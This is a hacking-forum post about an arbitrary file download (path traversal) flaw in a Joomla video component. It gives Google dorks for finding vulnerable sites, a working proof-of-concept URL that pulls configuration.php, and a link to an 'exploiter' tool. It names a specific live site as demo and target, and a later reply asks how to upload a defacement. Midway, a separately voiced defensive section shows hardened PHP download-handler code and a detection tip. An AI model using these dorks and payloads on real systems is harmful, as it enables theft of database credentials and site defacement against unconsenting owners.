This is for those who have already dabbled in the Arbitrary File Download vuln...
It is still active right now, so I don't think it's wrong to call it a new vuln..
To be more precise, it's a way of hacking by downloading the config file from the remote server..
Google Dork: "com_contushdvideoshare"
or
Google Dork: "/components/com_contushdvideoshare/hdflvplayer/"
POC : localhost//components/com_contushdvideoshare/hdflvplayer/download.php?f=../../../configuration.php
I think it will work... it's still working for me anyway :P
For those who want to use an exploiter, I've made one..
Exploiter : http://msys.yzi.me/joomla%20componet.php
Demo > http://fcat.dyndns.org/components/com_contushdvideoshare/views/membercollection/
Vuln >http://fcat.dyndns.org/components/com_contushdvideoshare/hdflvplayer/download.php?f=../../../configuration.php
[Image: screenshot of the vulnerable page]
[Image: screenshot with the exploiter]
How?:P
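For anyone maintaining a site that ships a download.php like the one above, here is what the bug looks like in code and how a download handler should be written instead. This is an added illustration, not the component's actual source: the vulnerable pattern is the generic shape that makes "?f=../../../configuration.php" work, and the directory name, the allowed extensions and the function names (vulnerableDownloadPath, safeDownloadPath, serveDownload) are assumptions.

```php
<?php
// Assumed vulnerable pattern (not the component's real code): the user-controlled
// "f" parameter is joined to the base directory with no canonicalisation and no
// containment check, so "../../../configuration.php" walks out of the media
// directory and the handler streams the Joomla configuration file back.
function vulnerableDownloadPath(string $baseDir, string $f): string
{
    return $baseDir . '/' . $f;
}

// Hardened version. Only regular files that resolve (after "../" and symlink
// resolution) to a location inside $baseDir, and only with an allowlisted
// extension, are served. Returns the canonical path, or null to refuse.
function safeDownloadPath(string $baseDir, string $f): ?string
{
    $allowedExt = ['mp4', 'flv', 'jpg', 'png'];   // assumption: media-only directory

    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // The client may name a file, never a path: reject NUL bytes and separators.
    if ($f === '' || strpbrk($f, "\0/\\") !== false) {
        return null;
    }
    $ext = strtolower(pathinfo($f, PATHINFO_EXTENSION));
    if (!in_array($ext, $allowedExt, true)) {
        return null;
    }
    $candidate = realpath($base . DIRECTORY_SEPARATOR . $f);
    if ($candidate === false || !is_file($candidate)) {
        return null;
    }
    // Containment check on the canonical path. Comparing against base plus a
    // separator keeps "/var/www/media2/x" from passing for base "/var/www/media".
    if (strncmp($candidate, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $candidate;
}

// Serve the file only after the path has been validated; respond with 404 for
// anything refused so the handler leaks nothing about what exists outside the
// media directory.
function serveDownload(string $baseDir, string $f): void
{
    $path = safeDownloadPath($baseDir, $f);
    if ($path === null) {
        http_response_code(404);
        exit;
    }
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="' . basename($path) . '"');
    header('Content-Length: ' . filesize($path));
    readfile($path);
}

// Usage (assumed directory name):
// serveDownload(__DIR__ . '/media', $_GET['f'] ?? '');
```

The extension allowlist and the separator rejection are the cheap checks; the realpath containment test is the one that actually closes the traversal, because it is evaluated on the resolved path rather than on the string the client sent. On the detection side, the same request shape, a download endpoint with a parameter containing "../" and ending in configuration.php, is easy to alert on in web server access logs.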
Bro, on the sites with this vul, I can't open Index.html. I want to upload a deface... hehe
Haha, take it easy, man.